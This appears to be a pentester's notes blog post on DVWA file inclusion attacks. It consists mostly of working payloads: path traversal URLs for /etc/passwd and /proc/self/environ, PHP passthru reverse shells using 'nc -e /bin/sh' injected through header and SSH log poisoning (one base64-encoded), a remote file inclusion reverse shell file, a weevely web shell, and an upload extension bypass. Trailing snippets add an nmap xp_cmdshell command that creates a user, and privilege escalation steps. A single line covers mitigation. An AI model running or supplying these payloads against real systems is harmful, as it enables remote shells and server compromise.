Skip to main content

File Inclusion

File Inclusion

http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../etc/passwd  --> to get passwords s

-------------------------------------------------------------------------------------------------------
     WEB TERMINAL ACCESS USING FILE INCLUSION      ==========================                                    using environmental variables
---------------------------------------------------------------------------------------------------------

cat /proc/self/environ --> to see environment variables

Opening Environment variables in the target machine
 --> http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../proc/self/environ

Now Intercept the request using brup suite -
change the browser name log to a php code in the burp suite in header <?phpinfo()?>

type in command prompt
 --> nc -vv -l -p 8888
type in burp suite header (request)
 --> <?passthru("nc -e /bin/sh attacker_ip 8888"); ?>   // <?passthru("nc -e /bin/sh 192.168.149.128 8888"); ?>



-------------------------------------------------------------------------------------------------------
WEB TERMINAL ACCESS USING FILE INCLUSION ============================================using logs --> var/log/auth.log
  --> var/log/apache2/access.log
---------------------------------------------------------------------------------------------------------
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../var/log/auth.log
--> var/log/auth.log shows the authenticated logs

--> lets try to login using "ssh" into the server and check the logs

ssh random@192.168.149.136
random
--> a log is logged


ssh "<?passthru('nc -e /bin/sh attacker_ip 8888');?>"@victim_IP

need to convert the command into base64 --> nc -e /bin/sh attacker_ip 8888
--> open burpsuite and go to decoder paste: nc -e /bin/sh attacker_ip 8888
--> copy the encoded code and paste in the bmMgLWUgL2Jpbi9zaCBhdHRhY2tlcl9pcCA4ODg4


ssh "<?passthru(base64_decode('bmMgLWUgL2Jpbi9zaCBhdHRhY2tlcl9pcCA4ODg4'));?>"@victim_IP


 -->type in command prompt
nc -vv -l -p 8888


--> now open this

http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../var/log/auth.log

--> In Cmd type
 id
 ls
 pwd


===========================================================================================================
- Remote File Inclusion - Low Security -----------------------------
===========================================================================================================

It is a special case of file inclusion vulnerabilities. if a server configured to allow a certain function caleed allow
url, allow_url fopen. we will be able to include to any file from any computer to the target computer. can upload any
php file. we can run payloads, reverse shells and system commands as well.


In dvwa, remote file inclusion is turned off, we need to turn it on

sudo nano /etc/php5/cgi/php.ini
ctrl+w--> search for allow_url and type "On"
ctrl +x
yes
sudo /etc/init.d/apache2 restart


file should be stored on a real server with an ip which should be remotely accessible


<?php

passthru("nc -e /bin/sh 192.168.149.128 8080");


?>

save it as reverse.txt file in /var/www/html

open it as http://localhost/reverse.txt   --> should be accessible remote if u want to hack a real server

in cmd type
--> nc -vv -l -p 8080

run this now ...

http://192.168.149.136/dvwa/vulnerabilities/fi/?page=http://192.168.149.128/reverse.txt?

whoami
uname -a
ls
pwd


==========================================================================================================
-------------------------- Remote File Inclusion - MediumSecurity -------------
===========================================================================================================
 nc -vv -l -p 8080
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=hTTp://192.168.149.128/reverse.txt?





securing from Remote file inclusion:


sudo nano /etc/php5/cgi/php.ini
ctrl+w--> search for allow_url and type "Off"
    allow_url_include = Off
ctrl +x
yes
sudo /etc/init.d/apache2 restart v






File upload vulnerability:
--------------------------
Generate a web payload and gain remote connection or access:
--> weevely generate 12345 /root/Desktop/shell.php   // 123456 is the password
To run it
--> weevely link_of_shell password
change the extension of the file from php to jpg

modify requests using burpsite while uploading file, change the extension of the file from jpg to php

Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Forensics & Crypto

Online Decoder --> https://2cyr.com/decode/ Encoding errors -->  https://ftfy.now.sh/ File Signatures List -->  Click here PCAP Analysis: -->  https://www.packettotal.com/ Online Cipher Decryptors: CyberChef  - Cipher Decoder   Crack Station-Hash Cracke r Decrypt Any Kind of Hash 1)  Cipher Statistics 2)  Index of Coincidence Calculator - Online IC Cryptanalysis Tool 3)  Tools List (Awesome and Fantastic Tools) Available on dCode 4)  Solve an Aristocrat or Patristocrat 5)  RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data 5-1)  RSA - Find PQ using N 6)  BertNase's Own Hide content in a Image made of blocks - npiet fun! 7)  Vigenere Solver - www.guballa.de 8)  Fernet (Decode) 9)  Unicode Text Steganography Encoders/Decoders 10)  All in ONE encoders and Decoders Tool 11) Cryptii - Decoder Image Forensics: 1)  Forensically, free online photo forensics tools - 29a.ch 2)  StegSolve to decryt data in